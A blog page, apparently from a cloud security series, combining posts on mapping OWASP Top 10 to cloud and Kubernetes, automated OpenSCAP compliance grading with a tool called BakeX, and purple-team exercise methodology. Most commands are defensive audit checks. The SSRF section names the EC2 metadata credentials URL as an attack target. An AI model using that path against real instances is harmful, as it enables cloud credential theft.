Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

IMDSv2 requires a PUT request to get a session token before credentials can be retrieved — a SSRF via GET cannot retrieve IMDSv2 credentials. Enforcing IMDSv2 closes the SSRF-to-credentials path.

# Check all EC2 instances for IMDSv1 (HttpTokens != "required" means vulnerable)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    ID:InstanceId,
    Name:Tags[?Key==`Name`]|[0].Value,
    IMDSv2:MetadataOptions.HttpTokens,
    State:State.Name
  }' \
  --output table

# Enforce IMDSv2 on a specific instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-endpoint enabled

The Series Attack Map: Which Episodes Cover Which Categories

OWASP	Category	Purple Team Episode
A01	Broken Access Control	EP04: Broken access control in AWS
A02	Cryptographic Failures	EP06 (partial): CI/CD secrets exposure
A03	Injection	EP07: SSRF to cloud metadata
A04	Insecure Design	EP08: Kubernetes container escape
A05	Security Misconfiguration	EP08: Kubernetes container escape
A06	Vulnerable Components	EP09: Supply chain attacks
A07	Authentication Failures	EP05: MFA fatigue attacks
A08	SW/Data Integrity	EP06: CI/CD secrets exposure, EP09: Supply chain
A09	Logging/Monitoring Failures	EP11: Detection engineering with eBPF
A10	SSRF	EP07: SSRF to cloud metadata

Run This in Your Own Environment: OWASP Coverage Self-Assessment

Run this against your AWS account and record the results as your OWASP A01–A10 baseline before the EP04 exercise:

#!/bin/bash
# Purple Team EP02 — OWASP Cloud Coverage Check
# Run in an account with read-only IAM permissions

echo "=== A01: Broken Access Control ==="
echo "--- S3 public access block status ---"
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) 2>/dev/null || \
  echo "WARN: Account-level public access block not set"

echo ""
echo "=== A02: Cryptographic Failures ==="
echo "--- EBS default encryption ---"
aws ec2 get-ebs-encryption-by-default --query 'EbsEncryptionByDefault' --output text

echo ""
echo "=== A05: Security Misconfiguration ==="
echo "--- GuardDuty status in current region ---"
aws guardduty list-detectors --query 'DetectorIds' --output text || echo "DISABLED"

echo ""
echo "=== A07: Authentication Failures ==="
echo "--- IAM users without MFA ---"
aws iam generate-credential-report 2>/dev/null
sleep 3
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "NO MFA: "$1}'

echo ""
echo "=== A09: Logging/Monitoring Failures ==="
echo "--- CloudTrail multi-region trail ---"
aws cloudtrail describe-trails --query 'trailList[?IsMultiRegionTrail==`true`].Name' --output text || \
  echo "WARN: No multi-region trail"

echo ""
echo "=== A10: SSRF ==="
echo "--- EC2 instances with IMDSv1 enabled ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`].{ID:InstanceId,IMDS:MetadataOptions.HttpTokens}' \
  --output table

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Treating it as a checklist, not a threat model. OWASP categories are not yes/no checkboxes. “Is broken access control present?” is not a question with a binary answer. The question is: which resources are accessible to which principals, and is that access correct given the intended design?

Ignoring A09 (Logging/Monitoring) until the breach. The first nine categories are about preventing or limiting the attack. A09 is about knowing it happened. Without A09 controls, you will not know you were breached until a third party tells you.

Fixing web-layer controls and ignoring the infrastructure equivalents. An organization that scores well on OWASP in their web application pen test may still have public S3 buckets, IMDSv1 enabled everywhere, and no CloudTrail in us-west-1. The mapping in this episode applies to infrastructure — run it separately from your application security assessments.

Conflating A06 (Vulnerable Components) with just “patch management.” XZ Utils was fully patched in the affected timeframe — the malicious version was the latest release. A06 in the supply chain context is about verifying the integrity of what you install, not just its version number.

Quick Reference

OWASP	Cloud Infrastructure Equivalent	Detection Tool
A01	IAM wildcards, public S3, broad trust policies	AWS Config, CloudTrail
A02	Plaintext secrets in env vars, unencrypted S3	TruffleHog, Macie
A03	SSRF, Log4j JNDI injection	WAF logs, CloudTrail IMDS calls
A04	Privileged containers, no seccomp	OPA/Gatekeeper, Falco
A05	K8s RBAC defaults, open etcd, open SGs	kube-bench, AWS Config
A06	Unpatched base images, transitive CVEs, supply chain	Trivy, Grype, SLSA
A07	MFA fatigue, long-lived sessions, stolen tokens	GuardDuty, Okta logs
A08	Unsigned images, mutable CI references, build compromise	Cosign, SLSA, OIDC
A09	No CloudTrail, no GuardDuty, no runtime telemetry	AWS Security Hub
A10	IMDSv1 on EC2, SSRF to internal endpoints	VPC Flow Logs, CloudTrail

Key Takeaways

OWASP Top 10 is a threat taxonomy — every category has a cloud, Kubernetes, or Linux infrastructure equivalent
A01 (Broken Access Control) is the most common cloud failure: IAM wildcards, public S3, and overly broad trust policies
A10 (SSRF) is what enabled the Capital One breach — IMDSv1 on EC2 makes any SSRF a credential theft path
A08 (Software/Data Integrity) is the SolarWinds attack class — supply chain compromise of the build pipeline itself
A09 (Logging/Monitoring) is the category that turns the other nine from “detectable breach” into “11-day dwell time”
Fixing A01–A08 without A09 means you improve your controls but still won’t know when they’re bypassed
Run the OWASP coverage self-assessment above and record your baseline before starting the episode exercises

What’s Next

EP03 is the breach landscape: six major incidents from December 2020 (SolarWinds) through April 2024 (XZ Utils). Each one maps to the OWASP categories from this episode. The pattern across all six is three root causes — identity, supply chain, misconfiguration — and understanding that pattern tells you where to spend your next purple team exercise. The cloud security breaches from 2020 to 2025 are the empirical record this series is built on.

Get EP03 in your inbox when it publishes → subscribe at linuxcent.com

Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment

July 27, 2026May 15, 2026 by Vamshi Krishna Santhapuri

Reading Time: 6 minutes

OS Hardening as Code, Episode 4
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance**

Note: the tool in this series was released as Stratum and renamed to BakeX at
v0.6.0 — same project, same license, same team. Commands below use the current bakex
CLI. If you arrived here looking for stratum or pip install stratumoss, you’re in the
right place: github.com/invicton/bakex.

TL;DR

“We use CIS L1” means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed
BakeX runs OpenSCAP as a stage of every build, and the scan result carries a letter grade A–F
The grade is OpenSCAP’s own XCCDF score mapped to a letter: A ≥ 90, B ≥ 75, C ≥ 60, D ≥ 40, F below that
SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM
Scanning and baseline comparison live in the web UI and HTTP API, not the CLI — the CLI is validate and build
A build whose scan fails the blueprint’s threshold ends in Status: failed with exit code 1, and no image is snapshotted

The Problem: A Grade That’s Never Been Verified Is Not a Grade

Security audit request:
"Provide CIS L1 compliance evidence for all production instances"

Team response:
  Instance A: "CIS L1 hardened" — OpenSCAP last run: 4 months ago
  Instance B: "CIS L1 hardened" — OpenSCAP last run: never
  Instance C: "CIS L1 hardened" — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: "CIS L1 hardened" — manual scan output: "87% passing"
  Instance E: "CIS L1 hardened" — manual scan output: "91% passing"

"Which profile was used for D and E? Are they comparable?"
"Were they scanned before or after a recent kernel update?"
"Why is C running an old OpenSCAP version?"

Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.

EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can’t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.

A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.

The audit found four problems:
1. Two instances had been scanned with CIS L1, not L2, despite being labeled “CIS L2”
2. Three instances hadn’t been scanned in over six months
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)
4. Two instances showed “91% passing” and “89% passing” — with no documentation of whether those were acceptable thresholds or what the failing controls were

The audit took two weeks to resolve. The finding wasn’t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.

The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.

How Automated OpenSCAP Compliance Works

Scanning is a stage of the build, not an afterthought you remember to run:

bakex build blueprints/ubuntu/22.04/cis-l1-aws.yaml
      │
      ├─ Provisioning via aws
      │
      ├─ Applying pre-hardening system configuration
      │    (hostname, filesystem, users)
      │
      ├─ Applying Ansible-Lockdown hardening roles
      │
      ├─ Running OpenSCAP compliance scan
      │    ├── benchmark:  xccdf_org.ssgproject.content_benchmark_UBUNTU2204
      │    ├── profile:    ...content_profile_cis_level1_server
      │    └── datastream: ssg-ubuntu2204-ds.xml
      │
      ├─ Snapshotting golden image
      │
      └─ Image ready: ami-0a7f3c9e82d1b4c05

All three compliance identifiers come from the blueprint’s compliance block, and they are full
XCCDF strings rather than friendly names like cis-l1 — they’re handed to oscap unmodified, so
there is no name-mapping layer that can silently pick the wrong profile. That single detail
answers the audit question “which profile was actually used?” without anyone having to remember.

Ubuntu is a special case worth knowing: it ships no SCAP content package in the archive, so BakeX
downloads the matching datastream from a ComplianceAsCode release and checksum-verifies it rather
than failing or silently scanning nothing.

The A-F Grade Calculation

The grade is deliberately boring, and that is the point. BakeX does not invent a scoring model —
it takes OpenSCAP’s own XCCDF score and maps it to a letter:

def score_to_grade(score: float) -> str:
    if score >= 90: return "A"
    if score >= 75: return "B"
    if score >= 60: return "C"
    if score >= 40: return "D"
    return "F"

Grade	Score	Meaning
A	≥ 90	Production-ready, minimal exceptions
B	≥ 75	Acceptable with documented exceptions
C	≥ 60	Below standard — deploy with caution
D	≥ 40	Significant gaps — do not deploy to production
F	< 40	Hardening failed

The thresholds are fixed, not per-blueprint tunables. That is a defensible choice: a grade you can
adjust in the file being graded is not evidence, it’s decoration. If an A means ≥ 90 everywhere,
two teams’ grades are comparable without reading their blueprints — which was exactly the failure
in the audit story above.

What is configurable is when the build refuses to continue:

compliance:
  benchmark: xccdf_org.ssgproject.content_benchmark_UBUNTU2204
  profile: xccdf_org.ssgproject.content_profile_cis_level1_server
  datastream: /usr/share/xml/scap/ssg/content/ssg-ubuntu2204-ds.xml
  fail_on_findings: true      # findings at/above the threshold fail the build
  severity_threshold: medium  # critical | high | medium | low

fail_on_findings with a severity_threshold is severity-based rather than score-based, which
tends to match how people actually reason about risk: one critical finding should block a release
even when 94% of rules pass. When it trips, the build ends in Status: failed, exit code 1, and
no image is snapshotted.

Where the Scan Surface Actually Lives

Worth being blunt about this, because it is the most common wrong assumption: there is no
bakex scan command. The CLI is two verbs — validate and build. Scanning, history, and
baseline comparison live in the web app and its HTTP API, because scan results need somewhere to
persist and something to render them.

Start the server and the whole surface is there:

bakex serve --port 8000

The auditor API is mounted at /api/auditor:

Endpoint	What it does
`POST /api/auditor/scan-image`	Scan an image and return a job
`POST /api/auditor/scan-container`	Same, for a container image
`GET /api/auditor/jobs`	List scan jobs
`GET /api/auditor/jobs/{job_id}`	One job, with grade and severity counts
`GET /api/auditor/jobs/{job_id}/compare/{baseline_id}`	Diff a scan against a baseline
`GET /api/auditor/scan-image/{job_id}/report?fmt=…`	Export the report
`GET /api/auditor/scan-image/{job_id}/badge.svg`	Grade badge for a README

SARIF Export

The report endpoint speaks three formats, selected by query parameter:

# Human-readable — printable HTML, print-to-PDF from the browser
curl "http://localhost:8000/api/auditor/scan-image/$JOB/report?fmt=html"

# Machine-readable job dict
curl "http://localhost:8000/api/auditor/scan-image/$JOB/report?fmt=json"

# SARIF 2.1.0 — the one that matters for CI
curl -o scan.sarif.json \
  "http://localhost:8000/api/auditor/scan-image/$JOB/report?fmt=sarif"

SARIF 2.1.0 is the standard interchange format for security scan results, which means the OpenSCAP
findings land wherever your other scanners’ findings already land:

GitHub Advanced Security — upload with github/codeql-action/upload-sarif; findings appear in the Security tab, annotated on the PR
Azure DevOps — native SARIF viewer
Splunk / SIEM — structured JSON, parseable as events
AWS Security Hub — importable as findings via the Security Hub API

For audit purposes the SARIF file is the evidence artifact: it carries every rule result, the
profile that was used, and the timestamp. “91% passing” in a spreadsheet is a claim. A SARIF file
in the Security tab is a record.

The badge endpoint is the small touch that gets used most — badge.svg renders the letter grade,
so a repo’s README can show the compliance grade of the image it builds, next to the CI badge.

Drift: Comparing Against a Baseline

The comparison endpoint takes two job IDs — a current scan and a stored baseline — and reports the
delta, including the change in score:

curl "http://localhost:8000/api/auditor/jobs/$CURRENT/compare/$BASELINE"

That is the mechanism behind “what changed since we built this.” You scan the image at build time,
keep that job as the baseline, and re-scan later; the comparison tells you which rules moved and
which direction the score went. It is how you find the instance somebody modified “temporarily”
and never reverted.

The honest limitation: this compares scan jobs, so drift detection is as good as your discipline
about scanning on a schedule. Nothing re-scans your fleet for you.

What Controls Typically Block an A Grade

For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:

Control	Why it often fails	Fix
1.1.7 `/var/log/audit` separate partition	Cloud images don’t have separate volumes at build time	Add EBS volume, configure at launch
1.6.1 AppArmor bootloader config	GRUB parameters not set correctly	Update `/etc/default/grub`, run `update-grub`
3.1.1 Disable IPv6	Cloud networking sometimes requires IPv6	Override with documented reason if intentional
5.2.21 SSH MaxStartups	Default sshd_config not updated	Add `MaxStartups 10:30:60` to sshd_config
6.1.10 World-writable files	Some package installations leave world-writable files	Post-install cleanup in Ansible role

The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.

Key Takeaways

Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it’s ever deployed
The grade is OpenSCAP’s own XCCDF score mapped to a fixed scale (A ≥ 90, B ≥ 75, C ≥ 60, D ≥ 40) — fixed on purpose, so grades from two teams are comparable without reading their blueprints
The build gate is severity-based, not score-based: fail_on_findings plus severity_threshold blocks a release on one critical finding even when most rules pass
SARIF 2.1.0 export makes scan results importable into GitHub Advanced Security, Azure DevOps, SIEM, and audit tooling — the SARIF file is the evidence artifact
Scanning and baseline comparison are HTTP API surfaces, not CLI commands; the CLI is validate and build

What’s Next

Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production “just this once.”

The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: POST /api/pipeline/scan fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won’t let it through.

Next: CI/CD compliance gate — block unhardened images before they reach production

Get EP05 in your inbox when it publishes → linuxcent.com/subscribe

What Is Purple Team Security: Red + Blue = Better Defense

May 11, 2026 by Vamshi Krishna Santhapuri

Reading Time: 8 minutes

What Is Purple Team Security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025

TL;DR

Purple team security is the practice of combining offensive (red) and defensive (blue) work in the same exercise — attackers simulate real techniques while defenders tune detection in real time
Traditional red team engagements produce a report; purple team produces a faster MTTD (mean time to detect)
The structural output is not a findings list — it’s updated detection rules, tested playbooks, and a measured detection baseline
Purple team is not a permanent headcount; it is a cadence of exercises run against your own infrastructure
Every episode in this series follows the red-blue-purple model: attack simulation → detection → structural fix

OWASP Mapping: This episode establishes the series methodology. No single OWASP category. Subsequent episodes map directly to A01 through A10.

The Big Picture

┌─────────────────────────────────────────────────────────────────┐
│                    PURPLE TEAM MODEL                            │
│                                                                 │
│   RED TEAM                    BLUE TEAM                         │
│   (Offensive)                 (Defensive)                       │
│                                                                 │
│   ┌──────────┐               ┌──────────┐                       │
│   │ Simulate │──── attack ──▶│  Detect  │                       │
│   │ attack   │               │  alert   │                       │
│   └──────────┘               └──────────┘                       │
│         │                          │                            │
│         └──────────┬───────────────┘                            │
│                    │                                            │
│              ┌─────▼──────┐                                     │
│              │  DEBRIEF   │  ← The purple layer                 │
│              │ What fired?│                                      │
│              │ What didn't│                                      │
│              │ Why?       │                                      │
│              └─────┬──────┘                                     │
│                    │                                            │
│         ┌──────────▼──────────┐                                 │
│         │  Updated detection  │                                 │
│         │  rules + playbooks  │                                 │
│         └─────────────────────┘                                 │
│                                                                 │
│   OUTCOME: Detection time drops exercise-over-exercise          │
└─────────────────────────────────────────────────────────────────┘

What is purple team security? It is the structured practice of attacking your own infrastructure — with full visibility on both sides — so that detection logic improves after every exercise, not just after a real breach.

Why Red vs. Blue Alone Fails

Eleven days.

That was how long an attacker had access before my blue team detected the compromise in a red team engagement I ran two years ago. It was a standard authorized engagement — well-scoped, realistic techniques, no shortcuts. The red team was good. The blue team was experienced. And still: eleven days.

The debrief was the turning point. The red team had used techniques that generated logs — CloudTrail entries, VPC Flow Log anomalies, process spawn events. The blue team had the data. The detections just weren’t tuned for these specific patterns. Nobody had ever run the techniques against this specific environment and verified whether the alerts fired.

We restructured the next exercise as a purple team exercise. Same attacker techniques. But this time, the blue team was in the room with the red team. They watched each technique execute in real time. They checked whether the alert fired. When it didn’t, they wrote the detection rule on the spot and verified it before moving to the next technique.

Detection time in the following exercise: four hours.

That is the entire argument for purple team security. Not philosophy. Not org charts. Eleven days versus four hours.

What Red Team Alone Gets Wrong

Traditional red team engagements produce a report with findings. The findings describe what the attacker did. The recommendations describe what to fix. Then the report goes to a remediation queue, the org closes the tickets over three months, and the detection logic is never tested.

The fundamental problem: a red team report tells you what happened; it doesn’t tell you whether your detection would catch it happening again.

The MITRE ATT&CK framework lists over 400 techniques. An annual red team engagement tests maybe 20 of them against your environment. You get a PDF. You don’t get a detection baseline.

Red team alone also creates adversarial dynamics inside the organization. Red team wins when they’re not caught. Blue team wins when they catch everything. These goals are structurally opposed, which means neither team has an incentive to share information that would help the other.

What Blue Team Alone Gets Wrong

Blue team without red team input is writing detection rules in the abstract. They tune alerts based on what they think an attacker would do, not what an attacker actually does against your specific environment with your specific tooling.

Signature-based detection catches known-bad. Behavioral detection catches anomalies. Neither catches a sophisticated attacker who has studied your baseline — unless you’ve explicitly tested whether the behavior that attacker uses registers as an anomaly in your environment.

Blue teams also tend toward alert fatigue. When everything fires, nothing gets investigated. Tuning requires knowing which signals correspond to real techniques, and that knowledge only comes from running the techniques.

The Purple Team Model: How It Actually Works

Purple team security is not a permanent team structure. You don’t hire a purple team. You run purple team exercises.

The exercise structure:

1. SCOPE          — agree on the attack scenario (e.g., "compromised developer credentials")
2. RED EXECUTES   — red team runs the first technique in the scenario
3. BLUE OBSERVES  — blue team watches for the alert; records: fired / not fired / noisy
4. DEBRIEF        — immediate, technique by technique. Why didn't it fire? What data existed?
5. TUNE           — blue team updates detection rule. Red team re-runs. Verify it fires.
6. NEXT TECHNIQUE — repeat for every technique in the scenario
7. MEASURE        — record detection rate and detection time at the end of the exercise

The output of a purple team exercise is not a PDF. It is:
– Updated detection rules (tested and verified)
– A measured detection time for each technique
– A documented attack scenario with the specific commands used
– A baseline for the next exercise to beat

This is what “purple” means: the red and blue work together, in the same room or on the same call, producing improved defense as a direct output of the attack simulation.

The MITRE ATT&CK Scaffolding

Every purple team exercise is anchored to ATT&CK techniques. ATT&CK provides the shared vocabulary: red team uses technique T1078 (Valid Accounts), blue team knows which data sources detect T1078, and the exercise verifies whether those detections are actually implemented and tuned.

MITRE ATT&CK Technique
         │
         ├── Tactic: Initial Access / Persistence / Lateral Movement / ...
         ├── Data Sources: CloudTrail, Process events, Network traffic, ...
         ├── Detection: What behavioral indicator to look for
         └── Mitigations: What configuration change prevents or limits it

When you scope a purple team exercise using ATT&CK, you get explicit coverage tracking. After six exercises, you can report: “We have verified detections for 47 of the 112 techniques most relevant to our threat model. These 65 are not yet covered.”

That is a measurable security posture improvement. It is auditable. It is repeatable.

Where OWASP Fits in This Series

This series uses OWASP Top 10 (2021) as the threat taxonomy, not ATT&CK. The reason: OWASP Top 10 maps directly to the classes of vulnerability that caused the major breaches between 2020 and 2025 — and it is familiar to the developers and architects who need to remediate them.

The next episode maps every OWASP Top 10 category to its cloud and Kubernetes infrastructure equivalent. Most engineers think OWASP applies only to web applications. It doesn’t. Broken Access Control (A01) is the S3 bucket that’s public when it shouldn’t be. Cryptographic Failures (A02) is the environment variable with a plaintext database password committed to GitHub. Injection (A03) is the SSRF that hits the EC2 metadata endpoint.

The framing shifts. The categories don’t.

Red Phase Primer: How Attack Simulations Work in This Series

Every episode from EP04 onward follows this structure:

Red phase — the technique the attacker uses, with the actual commands. Not “the attacker exploited misconfigured IAM.” The actual aws CLI command or kubectl invocation that demonstrates the technique. Commands are safe for authorized use in your own environment or a test account.

Blue phase — what detection looks like. The CloudTrail event, the GuardDuty finding, the Falco rule, the SIEM query. If it doesn’t fire by default, the episode says so explicitly — and shows you how to make it fire.

Purple phase — the structural fix. Not “train your developers to be more careful.” The IAM policy, the SCPs, the network control, the pre-commit hook. The thing that makes the vulnerability not exist, not the thing that makes humans try harder to avoid it.

Run This in Your Own Environment: Baseline Your Current Detection Coverage

Before EP02, establish a detection baseline. This tells you where you start, so later exercises have a number to beat.

aws guardduty list-findings \
  --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
  --finding-criteria '{
    "Criterion": {
      "updatedAt": {
        "GreaterThanOrEqual": '$(date -d '30 days ago' +%s000)'
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 50 aws guardduty get-findings \
    --detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, severity: .Severity, count: 1}' | \
  jq -s 'group_by(.type) | map({type: .[0].type, count: length})'

# Check if CloudTrail is enabled and logging management events
aws cloudtrail describe-trails --query 'trailList[].{Name:Name,MultiRegion:IsMultiRegionTrail,LoggingEnabled:HasCustomEventSelectors}' --output table

# Check if S3 server access logging is enabled on all buckets
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    logging=$(aws s3api get-bucket-logging --bucket "$bucket" 2>/dev/null)
    if [ -z "$logging" ] || echo "$logging" | grep -q '{}'; then
      echo "NO LOGGING: $bucket"
    else
      echo "LOGGING OK: $bucket"
    fi
  done

Record your current findings count by category and the number of buckets without logging. These are your pre-exercise baselines.

⚠ Common Mistakes When Starting a Purple Team Practice

Running it as an annual event. One purple team exercise per year produces a report. Monthly exercises with 3–5 techniques each produce measurable improvement in detection time. Frequency is the variable.

Letting red and blue work in separate rooms. The purple layer is the debrief. If red sends a report and blue reads it later, you’ve just done a red team engagement. The real-time shared observation is what generates the immediate detection improvement.

Measuring success as “how many vulnerabilities were found.” The right metric is detection time per technique and detection coverage across your ATT&CK or OWASP matrix. Vulnerabilities found is an output of the exercise; faster detection is the outcome.

Starting with sophisticated techniques. The first exercise should test basics: credential access, S3 enumeration, IAM privilege escalation attempts. These generate straightforward logs in CloudTrail. If your detection doesn’t catch these, it won’t catch the sophisticated stuff either. Start where the coverage gaps are most embarrassing.

No documentation of the exercise environment state. If you tune a detection rule during an exercise and then a Terraform change overwrites the policy, you’ve lost the improvement. All detection changes from exercises go through version control immediately.

Quick Reference

Term	Definition
Purple team security	Practice of combined red/blue exercises where both teams improve detection together
MTTD	Mean Time to Detect — the primary metric purple team exercises reduce
ATT&CK	MITRE framework mapping adversary techniques to data sources and detections
Red phase	Attacker perspective: simulate the technique with real commands
Blue phase	Defender perspective: what detection fires (or doesn’t)
Purple phase	The joint debrief and immediate detection tuning that makes both better
Detection baseline	Measured MTTD and technique coverage before the first exercise
OWASP Top 10	Threat taxonomy used in this series — applies to infrastructure, not just web apps

Key Takeaways

Purple team security is a practice, not a team: structured exercises where red attacks and blue detects in real time, with joint debrief producing updated detection rules
The metric that matters is detection time per technique — not findings count
Red team alone produces a report; purple team produces a faster MTTD and tested detection coverage
MITRE ATT&CK provides the technique vocabulary; OWASP Top 10 provides the vulnerability taxonomy this series uses
Every major cloud breach 2020–2025 maps to an OWASP category — those categories are the exercise backlog for any cloud-running organization
Detection improvements from exercises must be version-controlled immediately or they disappear with the next infrastructure change
Frequency of exercises is the primary driver of improvement — monthly beats annual by an order of magnitude

What’s Next

EP02 maps every OWASP Top 10 category to its cloud infrastructure equivalent. Most engineers treat OWASP as a web application concern. The cloud security breaches from 2020 to 2025 tell a different story: the S3 bucket that became public is A01; the CI/CD pipeline secret is A08; the SSRF to EC2 metadata is A10. The taxonomy was always infrastructure-applicable. EP02 makes that mapping explicit — with the cloud-native equivalent, the real breach that demonstrates it, and the detection query to run.

Get EP02 in your inbox when it publishes → subscribe at linuxcent.com

bpftrace — Kernel Answers in One Line

July 6, 2026May 10, 2026 by Vamshi Krishna Santhapuri

